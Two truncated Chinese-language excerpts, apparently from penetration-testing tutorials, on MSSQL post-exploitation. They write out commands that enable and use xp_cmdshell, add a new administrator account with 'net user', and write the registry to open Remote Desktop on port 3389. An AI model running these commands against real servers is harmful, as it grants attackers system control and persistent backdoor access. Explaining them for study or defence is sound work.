master..xp_cmdshell'whoami' 尝试提权,添加新的管理员账户: exec xp_cmdshell'net user chanra521LoveYou/add' 似乎是mssql2019不能提权,尝试打开3389端口: exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','...
1. XP_CMDSHELL 这个大家都比较熟悉了,通过xp_cmdshell来执行命令,可使用以下语句来执行: exec master..xp_cmdshell "whoami" 默认情况下xp_cmdshell 是禁止的,如下图: 这个时候,可以使用以下命令进行开启: EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFI...